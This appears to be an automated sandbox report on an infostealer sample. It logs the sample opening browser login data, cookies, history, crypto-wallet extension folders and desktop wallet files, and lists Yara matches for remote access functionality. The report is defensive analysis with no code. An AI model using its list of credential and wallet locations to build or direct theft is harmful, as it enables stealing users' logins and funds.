Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: Yara match File source: Process Memory Space: a6f0d09f38.exe PID: 7620, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0000000F.00000003.2670852779.0000000001953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6e1fbaaba5.exe PID: 7984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a6f0d09f38.exe PID: 7620, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000000E.00000002.2641325721.00000000002C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2600123548.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: b5da647ae3.exe PID: 5500, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP